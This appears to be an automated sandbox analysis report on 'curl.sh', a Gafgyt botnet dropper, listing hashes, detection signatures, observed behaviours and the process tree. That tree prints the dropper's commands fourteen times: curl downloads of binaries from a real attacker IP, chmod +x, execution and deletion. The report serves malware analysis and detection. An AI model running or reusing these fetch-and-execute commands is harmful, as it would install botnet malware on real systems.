Analysis
-
max time kernel
150s -
max time network
149s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240729-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240729-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
11-01-2025 00:21
Static task
static1
Behavioral task
behavioral1
Sample
curl.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
curl.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
curl.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
curl.sh
Resource
debian9-mipsel-20240418-en
General
-
Target
curl.sh
-
Size
1KB
-
MD5
d8d6be287e3428bc6eb16a3e05e8ab47
-
SHA1
c6bba87f1258183e8e70b2ac18dee260c48eb04d
-
SHA256
72f5f8ec4a91b6d69c3e3be588664aba1c2c511ecdfd8430dc0edf9d1af00353
-
SHA512
a8a1f7d030459952f7523cdc2345844d3ce1f6da443a302c17b32fc053fe12a36aed91fa507f0575cce11459434224a54bd21bb814606bc964ec9476a549ceee
Malware Config
Signatures
-
Detected Gafgyt variant 14 IoCs
resource yara_rule behavioral1/files/fstream-1.dat family_gafgyt behavioral1/files/fstream-2.dat family_gafgyt behavioral1/files/fstream-3.dat family_gafgyt behavioral1/files/fstream-4.dat family_gafgyt behavioral1/files/fstream-5.dat family_gafgyt behavioral1/files/fstream-6.dat family_gafgyt behavioral1/files/fstream-7.dat family_gafgyt behavioral1/files/fstream-8.dat family_gafgyt behavioral1/files/fstream-9.dat family_gafgyt behavioral1/files/fstream-10.dat family_gafgyt behavioral1/files/fstream-11.dat family_gafgyt behavioral1/files/fstream-12.dat family_gafgyt behavioral1/files/fstream-13.dat family_gafgyt behavioral1/files/fstream-14.dat family_gafgyt -
Gafgyt family
-
File and Directory Permissions Modification 1 TTPs 14 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1525 chmod 1586 chmod 1513 chmod 1554 chmod 1566 chmod 1561 chmod 1571 chmod 1530 chmod 1535 chmod 1540 chmod 1581 chmod 1520 chmod 1547 chmod 1576 chmod -
Executes dropped EXE 14 IoCs
ioc pid Process /tmp/ss 1514 ss /tmp/ssb 1521 ssb /tmp/ssc 1526 ssc /tmp/ssd 1531 ssd /tmp/sse 1536 sse /tmp/ssg 1541 ssg /tmp/ssh 1548 ssh /tmp/ssi 1555 ssi /tmp/ssl 1562 ssl /tmp/ssp 1567 ssp /tmp/sss 1572 sss /tmp/sst 1577 sst /tmp/ssx 1582 ssx /tmp/ssy 1587 ssy -
Modifies Watchdog functionality 1 TTPs 8 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process File opened for modification /dev/misc/watchdog ssh File opened for modification /dev/watchdog ssi File opened for modification /dev/misc/watchdog ssi File opened for modification /dev/watchdog ss File opened for modification /dev/misc/watchdog ss File opened for modification /dev/watchdog ssg File opened for modification /dev/misc/watchdog ssg File opened for modification /dev/watchdog ssh -
Reads system routing table 1 TTPs 4 IoCs
Gets active network interfaces from /proc virtual filesystem.
description ioc Process File opened for reading /proc/net/route ss File opened for reading /proc/net/route ssg File opened for reading /proc/net/route ssh File opened for reading /proc/net/route ssi -
Changes its process name 4 IoCs
description ioc pid Process Changes the process name, possibly in an attempt to hide itself sshd 1514 ss Changes the process name, possibly in an attempt to hide itself sshd 1541 ssg Changes the process name, possibly in an attempt to hide itself sshd 1548 ssh Changes the process name, possibly in an attempt to hide itself sshd 1555 ssi -
Reads system network configuration 1 TTPs 4 IoCs
Uses contents of /proc filesystem to enumerate network settings.
description ioc Process File opened for reading /proc/net/route ssh File opened for reading /proc/net/route ssi File opened for reading /proc/net/route ss File opened for reading /proc/net/route ssg -
Writes file to tmp directory 14 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/ssg curl File opened for modification /tmp/ssl curl File opened for modification /tmp/sss curl File opened for modification /tmp/ssx curl File opened for modification /tmp/ssc curl File opened for modification /tmp/ssd curl File opened for modification /tmp/sse curl File opened for modification /tmp/ssh curl File opened for modification /tmp/ssy curl File opened for modification /tmp/ss curl File opened for modification /tmp/ssb curl File opened for modification /tmp/ssi curl File opened for modification /tmp/ssp curl File opened for modification /tmp/sst curl
Processes
-
/tmp/curl.sh/tmp/curl.sh1⤵PID:1508
-
/usr/bin/curlcurl -o ss http://176.119.150.11/ss2⤵
- Writes file to tmp directory
PID:1509
-
-
/bin/chmodchmod +x ss2⤵
- File and Directory Permissions Modification
PID:1513
-
-
/tmp/ss./ss2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Reads system routing table
- Changes its process name
- Reads system network configuration
PID:1514
-
-
/bin/rmrm -rf ss2⤵PID:1518
-
-
/usr/bin/curlcurl -o ssb http://176.119.150.11/ssb2⤵
- Writes file to tmp directory
PID:1519
-
-
/bin/chmodchmod +x ssb2⤵
- File and Directory Permissions Modification
PID:1520
-
-
/tmp/ssb./ssb2⤵
- Executes dropped EXE
PID:1521
-
-
/bin/rmrm -rf ssb2⤵PID:1523
-
-
/usr/bin/curlcurl -o ssc http://176.119.150.11/ssc2⤵
- Writes file to tmp directory
PID:1524
-
-
/bin/chmodchmod +x ssc2⤵
- File and Directory Permissions Modification
PID:1525
-
-
/tmp/ssc./ssc2⤵
- Executes dropped EXE
PID:1526
-
-
/bin/rmrm -rf ssc2⤵PID:1528
-
-
/usr/bin/curlcurl -o ssd http://176.119.150.11/ssd2⤵
- Writes file to tmp directory
PID:1529
-
-
/bin/chmodchmod +x ssd2⤵
- File and Directory Permissions Modification
PID:1530
-
-
/tmp/ssd./ssd2⤵
- Executes dropped EXE
PID:1531
-
-
/bin/rmrm -rf ssd2⤵PID:1533
-
-
/usr/bin/curlcurl -o sse http://176.119.150.11/sse2⤵
- Writes file to tmp directory
PID:1534
-
-
/bin/chmodchmod +x sse2⤵
- File and Directory Permissions Modification
PID:1535
-
-
/tmp/sse./sse2⤵
- Executes dropped EXE
PID:1536
-
-
/bin/rmrm -rf sse2⤵PID:1538
-
-
/usr/bin/curlcurl -o ssg http://176.119.150.11/ssg2⤵
- Writes file to tmp directory
PID:1539
-
-
/bin/chmodchmod +x ssg2⤵
- File and Directory Permissions Modification
PID:1540
-
-
/tmp/ssg./ssg2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Reads system routing table
- Changes its process name
- Reads system network configuration
PID:1541
-
-
/bin/rmrm -rf ssg2⤵PID:1545
-
-
/usr/bin/curlcurl -o ssh http://176.119.150.11/ssh2⤵
- Writes file to tmp directory
PID:1546
-
-
/bin/chmodchmod +x ssh2⤵
- File and Directory Permissions Modification
PID:1547
-
-
/tmp/ssh./ssh2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Reads system routing table
- Changes its process name
- Reads system network configuration
PID:1548
-
-
/bin/rmrm -rf ssh2⤵PID:1552
-
-
/usr/bin/curlcurl -o ssi http://176.119.150.11/ssi2⤵
- Writes file to tmp directory
PID:1553
-
-
/bin/chmodchmod +x ssi2⤵
- File and Directory Permissions Modification
PID:1554
-
-
/tmp/ssi./ssi2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Reads system routing table
- Changes its process name
- Reads system network configuration
PID:1555
-
-
/bin/rmrm -rf ssi2⤵PID:1559
-
-
/usr/bin/curlcurl -o ssl http://176.119.150.11/ssl2⤵
- Writes file to tmp directory
PID:1560
-
-
/bin/chmodchmod +x ssl2⤵
- File and Directory Permissions Modification
PID:1561
-
-
/tmp/ssl./ssl2⤵
- Executes dropped EXE
PID:1562
-
-
/bin/rmrm -rf ssl2⤵PID:1564
-
-
/usr/bin/curlcurl -o ssp http://176.119.150.11/ssp2⤵
- Writes file to tmp directory
PID:1565
-
-
/bin/chmodchmod +x ssp2⤵
- File and Directory Permissions Modification
PID:1566
-
-
/tmp/ssp./ssp2⤵
- Executes dropped EXE
PID:1567
-
-
/bin/rmrm -rf ssp2⤵PID:1569
-
-
/usr/bin/curlcurl -o sss http://176.119.150.11/sss2⤵
- Writes file to tmp directory
PID:1570
-
-
/bin/chmodchmod +x sss2⤵
- File and Directory Permissions Modification
PID:1571
-
-
/tmp/sss./sss2⤵
- Executes dropped EXE
PID:1572
-
-
/bin/rmrm -rf sss2⤵PID:1574
-
-
/usr/bin/curlcurl -o sst http://176.119.150.11/sst2⤵
- Writes file to tmp directory
PID:1575
-
-
/bin/chmodchmod +x sst2⤵
- File and Directory Permissions Modification
PID:1576
-
-
/tmp/sst./sst2⤵
- Executes dropped EXE
PID:1577
-
-
/bin/rmrm -rf sst2⤵PID:1579
-
-
/usr/bin/curlcurl -o ssx http://176.119.150.11/ssx2⤵
- Writes file to tmp directory
PID:1580
-
-
/bin/chmodchmod +x ssx2⤵
- File and Directory Permissions Modification
PID:1581
-
-
/tmp/ssx./ssx2⤵
- Executes dropped EXE
PID:1582
-
-
/bin/rmrm -rf ssx2⤵PID:1584
-
-
/usr/bin/curlcurl -o ssy http://176.119.150.11/ssy2⤵
- Writes file to tmp directory
PID:1585
-
-
/bin/chmodchmod +x ssy2⤵
- File and Directory Permissions Modification
PID:1586
-
-
/tmp/ssy./ssy2⤵
- Executes dropped EXE
PID:1587
-
-
/bin/rmrm -rf ssy2⤵PID:1589
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
93KB
MD5571cf759d074ffb3ade51d8d72964416
SHA1bf3d0db705b8deb7015e80ef0c7419aefa833dd8
SHA2563173307bd4fb47b9bfff050f22be58fe2396e13f514d41b23f8f1922d5c7dd31
SHA512bda9127534ba0a674e378538268cf3450d58aff27142685afdac146759479f0d2af4429110b3b41b4c5b22652840820453f775861a0a9f2df572ddbe63c106e6
-
Filesize
121KB
MD58d1eeb9625c13d477f0e32cef54fa48e
SHA1f2dfd75b6867d1cd80a9ac3c992522af020eb5f9
SHA2568229fbb71847846c8bcb710f31e40f33cf18902c2f44df43ef7dea59b546848a
SHA5126bfe15810cab78c69ce6e1432b905b68cfcca3db52042ae8611ecdf59ebe7616bcca9e8126c115f70e7f684966987b1d3df2ee719f8e89d151688d1208d9f2b1
-
Filesize
114KB
MD5efe15ba1820417d03d93945493f85d40
SHA13eed1523b6e927eb1178599f648876d1e03fc97a
SHA256e307e9fcdf40303f6263af3d92ec709fd7137ffbceaabd4581ecba1120408a66
SHA5127d825da8769353521b1d4f8bb9e59c21cedd5dca8ac3493394546ee462ee640aa598cf04b00a92ca6af736c16d2b0b16689508d37378cf7f017246196bb9665d
-
Filesize
135KB
MD5c7212063b2e285ec072d0ab348ee208e
SHA15f8830f178b92946bedef6f8a58a6a762792a698
SHA25658042feda2e514f3c0badf4d7c527c8bf044e21169f287b895f7fa66e5a9c7f1
SHA512b77b00b30c424c7a2892f43373a783064c174cfc6df7ab73a944d512f11cd2c0ff6c808d656a30c3f891f28f2c46920bcd611ee48cceadc9e0a2e63b7ecd8c39
-
Filesize
172KB
MD5b926ed51ed242929568603920eeafa80
SHA1544d897f4ae68acdf362913d01aed9ce40a0f8f7
SHA25678d9bd20f10d57676983187d288e56103e535a16d8074efbcfa75491e541f452
SHA512da8f3ec6d2f0b156b7129e91c8f06f2e4b3e6c9fef7211e15ae44c23e713915df402ac75282dafc52ee16aa3fb7edfe35bb431c0fdf8a29242d73af903bd9a1e
-
Filesize
95KB
MD5f7ed48fc0de0651626d9f87b4727df79
SHA1ed72b4b70d2709aa1d3ba02c012936c6e429879d
SHA25607955ebd5a47d8a8d646b8e62cf7e4af1497609a66a4045a5a90251446e1ffc9
SHA51272647ac0abb4624e96f4d6bdf78b47062323cebb6672ac95d68e47329854c41cbf1f562014365fe36e74f9d227a42718a1a1e48ef35a6561550f54d2bca8c4fb
-
Filesize
108KB
MD5d80987391e75192cf4d80073f9d4d30e
SHA1496a56e87bb2715f711801a90905b3ca0069f11b
SHA25609f6d3428f6ad98b827b4a2d7cb2e5c62cd9a4e9477d6f6132f5c7e5b61deb00
SHA5129093017a3c6b5afde25d9f97512bda84ef902efe5c9de6e4717992d10e5a04f7fa7bda2761007accb9b125c628b5534fcbc1d60d79fad04a2fcf50e1958ac6d0
-
Filesize
93KB
MD5d1212df64a7d2d766b11b658c4773985
SHA10af16b515d81f1b5762f7df6086381889713a323
SHA256484fa86f32c345672f00534cc1184acb7f3cf0eceef7a92207ba58a3dbf566b4
SHA51248924fca90e330ce11ae99c77cea5efa9d3752989a2d25afe68d8fa9820f9ee3aa32acb250939bf49b3c460e6cbb27d924d8d4f0912259e709588208f5376029
-
Filesize
110KB
MD5df7cdcbff0e8955f819f4135b79bea6b
SHA1c2bb42d62ae722b770eef444045f98fec2936108
SHA256519998735de4fb37798bef44420a65c1e32708014adf8f9dcb37e978857049a1
SHA51262d1cb8291645594db64baaf86fade1b794673a11f42af49ef285c7a682c648790dd04c3c0b4a8c38de1b67fc7b26ec3a1d3b15043d948abaca58fedc7702e89
-
Filesize
123KB
MD5c8ab17b0f8a87a57b995e0751c0f5d6c
SHA15db69ac9deefb54135ed0479fde2c66ca682e49d
SHA25600e29fbc2da8092d07e4d251d7250af9d763aa3c742284ab6d06b2a6036c0253
SHA512513ab7f805e417fc0c31d2499c62a0b27108364651017832e76ae9927f38b3686f6087669db247e12e9a7d77b3ec1bfcbcf4c26f7af0c3643f5ff24a2c40acf0
-
Filesize
152KB
MD5355df6994cb5f3630648b5754714ea64
SHA119b79c2581b4b39232ed7bcc321f4ea5183d95f9
SHA256a30ef448e98d5aa6b2c06a407a335eeefe546eb933d1d0a8e6ab7ad1a1e4298e
SHA51265fb1e5a18bfdd894c4bc86f723cbe35f2189937f6033ca1d2e823c0d7413df99f5d16754a6e7bfe333f6b92f7fe8a35d422191637785c5b372daabeb6cb31b4
-
Filesize
152KB
MD5ca9c6f4322c9c6e0fe6e4490bf87ce42
SHA1e322d9d7342f3eb7808d018a0c602b453d5c9d5f
SHA2562936f3c8ef94b48648ec143cfce4d197e8826016213ce0f297bef149be7577bb
SHA512d896c6350cdf3132541ab2e8f68d18ab12946fb6fe17d1c02b57edd565d0bdb93fbb5ce96f61df9ff1b02fcedcf9b2618a036e84fde04a7af91e57720af12c8f
-
Filesize
110KB
MD50aba08f117d7b1e5faffc1e3bdaf8f31
SHA1656e5e6724e5915eadf2b8fe3baf7f36d1aedb70
SHA256c8324d2e1dbe352de9d94f079590b099159c102536a6ba24464379962a06e68c
SHA512c0b1c9975263ae23ae4ce50b77690a951807c4fa39070947f07a67742ce71652c4e5e3c24970583c6b3c5687e1d2909f2f7814e105751ec745859184d302f56c
-
Filesize
103KB
MD5fb6a59851faf43a7bf168e2ead828f93
SHA189454352f97fe8ff93d7e51bae7b86aa3e3a810c
SHA256e3c9fd938639392b6d9b8b4656d5b199c90356d0b61ea35b7a83202269e28df2
SHA512359bc1277ab172b587eeff94945a5198834cb708a0a7e1a0dbe71a15b137dbbb745be4ce03ed8e813ff3f3b417b8af5bfe75cbd8280305e0430f1a6c7b7eeb52